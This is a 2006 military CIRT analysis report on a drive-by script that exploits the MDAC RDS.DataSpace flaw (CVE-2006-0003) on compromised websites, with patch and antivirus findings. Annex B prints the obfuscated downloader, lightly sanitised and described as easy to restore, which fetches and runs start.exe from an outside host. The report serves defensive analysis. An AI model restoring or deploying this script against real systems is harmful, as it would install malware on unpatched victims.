3380-1 (CFNOC/DND CIRT) 10 May 06 IH&AA Supervisor ANALYSIS REPORTHOSTILE SCRIPT (CVE-2006-0003) INTRODUCTION 1. (U) Recently it appears that several websites were compromised and a hostile script inserted into the HTML source; follow-up investigation appears to indicate that the compromises in question may have occurred sometime in April 2006. 2. (U) In order to determine the nature of the threat and the vulnerability associated with the hostile code, initial analysis of this threat was conducted in the author's personal computer laboratory. AIM 3.
(U) The purpose of this report is twofold: a. to convey information regarding the nature of this threat and the associated vulnerability; and b. to demonstrate any activity associated with the threat.
DISCUSSION & ANALYSIS 4. (U) After configuration of the laboratory environment was complete the internal/external IDS/Sniffer platforms were initialized. The following compromised websites were then browsed to generate packet captures for the initial visit and a period of 60 minutes thereafter: a. creativemods.com (IP address 67.19.206.84); b. modelmayhem.com (IP address 66.98.170.84); c. sensuflex.com (IP address 207.217.96.28); d. topwallpapers.com (IP address 212.85.33.41); and e. pinupparadise.com (IP address 198.66.213.80); 5. (U) VMWare was utilized to emulate both patched and unpatched Windows XP/Windows 2000 platforms; the virtual machines were reinitialized after each visit in order to ensure that the results were unadulterated.
1
6. (U) Whilst loading the compromised webpage, a hostile script embedded in the page's HTML source (refer to annex B) runs and attempts to install malware designated "start.exe" from one of the following URIs (the URIs purposely broken to prevent accidental infection: a. h t t p://dnv-counter.com/trf/start.exe; or b. h t t p://us-counter.counter.com/trf/start.exe. 7. (U) In addition to downloading the malware in question, the hostile code also appears to incorporate a web counter facility; this is conceivably used by the entity responsible for the malware in order to record the number of compromised hosts. 8. (U) The following patch levels and operating systems were tested in the course of this investigation; current patches appear to be effective in preventing exploitation by the hostile script: a. Windows XP SP2 unpatched - infected; b. Windows XP SP2 patched to current patch level - no infection noted; c. Windows 2000 SP 4 unpatched - infected; and d. Windows 2000 SP 4 patched to current patch level - no infection noted. 9. (U) Various A/V implementations were utilized in an attempt to identify the downloader/malware in question; the detect results and the respective A/V implementations are as follows: a. McAfee - PWS-JA; b. Norton - Trojan.Download; c. Symantec Corporate - Trojan.Anserin, Trojan.Download c. Avast Home Edition - Win32:Trojano-P; and d. AVG Free - no detection. 10. (U) The script in question contained several obfuscated strings; obfuscation of hostile code is a very common technique used to evade detection and hinder analysis. All of the obfuscated and reconstituted strings found in the hostile script are demonstrated in annex C.
2
11. (U) One of the reconstituted strings appeared to be a Class ID1 (clasid) designated "BD96C556-65A3-11D0-983A"; this clasid corresponds to the client-side RDS.DataSpace2 object. 12. (U) The hostile code appears to specifically address the RDS.DataSpace object, which is deployed in Windows installations as an MDAC3 component. Considering this, the script clearly exploits the CVE-2006-0003 vulnerabilityi; the patches associated with Microsoft Security Bulletin MS06-014ii, issued on 11 April 2006, address this vulnerability. CONCLUSIONS & RECOMMENDATIONS 13. (U) This exploit is a potential threat to the organization's network assets for the following reasons: a. this threat is widely deployed and requires no interaction from the user beyond visiting a compromised website; b. the organization's current patch level does not include the patches associated with the MS06-014 vulnerability. c. although the current deployment of the organization's A/V suite will detect the threat automatically, no further action (e.g. deletion/ quarantine) is taken as the default response is "leave alone". 14. (U) As a result of the conclusions reached from the analysis of this threat, the following recommendations are hereby submitted for consideration: a. an emergency push to implement the patch associated with the MS06-014 vulnerability should be performed ASAP; and b. the default settings should be changed to allow for the quarantine of potential threats; and c. given the performance history of the current A/V implementation, heuristic detection protection should be set at maximum vice the current default level.
1
2
3
A clsid ("Class ID") is a globally unique identifier that serves to identify a COM ("Component Object Module") class object; COM is a Microsoft platform for software componentry that enables interprocess communication and dynamic object creation in any programming language that supports the technology. RDS (Remote Data Services) is a set of programming interfaces from Microsoft that enables users to update data on the Internet or intranets from their ActiveX-enabled browser. MDAC (Microsoft Data Access Components) is a package of database drivers from Microsoft used for connecting client PCs to databases in servers.
3
15. (U) Any questions regarding this report may be addressed to the undersigned. //signed//
E.L. Mac Daibhidh, CD Cpl Special Operations Analyst DND CIRT IH&AA Team Special Operations Cell 945-7747 Attachments: Annexes A-C
4
Annex A - Laboratory Configuration (U) The laboratory configuration utilized for the analysis associated with this report is demonstrated in the diagram below; the "Victim" host uses VMWare to emulate patched/unpatched versions of Windows XP Pro and Windows 2000.
Internet
Hub
Receive-Only CAT5
External IDS/Sniffer
Router Receive-Only CAT5
Hub
Internal IDS/Sniffer
Victim
5
Annex B - Hostile Script The sanitized version of the hostile script in question may be found below; should it be necessary to restore the script's functionality for lab purposes, simply delete all the [DELETE THIS] strings.
<script> function f[DELETE THIS](b, a, c) { return a + b + c; } function g[DELETE THIS](b, a) { return a + b; } var s[DELETE THIS] = new Array ( "", "start.[DELETE THIS]exe", "http://[DELETE THIS]dnv-counter.com/trf/blank.html", "object[DELETE THIS]", "classid[DELETE THIS]", f[DELETE THIS]("0C0", g(f(g("3-11D0-9", "56-65A"), "id:BD96C5", "83A-0"), "cls"), g("9E36", "4FC2")), g[DELETE THIS](f("ft.XMLH", "oso", "TTP"), "Micr"), f[DELETE THIS]("E", "G", "T"), f[DELETE THIS](g(".Str", "odb"), "Ad", "eam"), f[DELETE THIS](g(".She", "ipt"), "WScr", "ll"), "[DELETE THIS]PROCESS", "[DELETE THIS]TMP", "[DELETE THIS]/[^/]*$", "[DELETE THIS]/", "[DELETE THIS]\\" ); a = [DELETE THIS]document.createElement(s[3]); a.setAttribute[DELETE THIS](s[4], s[5]); with[DELETE THIS](a.CreateObject(s[6], s[0])) { open[DELETE THIS](s[7], location.href.replace(new RegExp[DELETE THIS](s[12]), s[13] + s[1]), false); send[DELETE THIS](); if[DELETE THIS](status < 400) with[DELETE THIS](a.CreateObject(s[8], s[0])) { Type[DELETE THIS] = 1; Open[DELETE THIS](); Write[DELETE THIS](responseBody); with[DELETE THIS](a.CreateObject(s[9], s[0])) { c[DELETE THIS] = Environment[DELETE THIS](s[10])(s[11]) + s[14] + s[1]; SaveToFile[DELETE THIS](c, 2); Exec[DELETE THIS](c); } } } location.replace[DELETE THIS](s[2]); // -->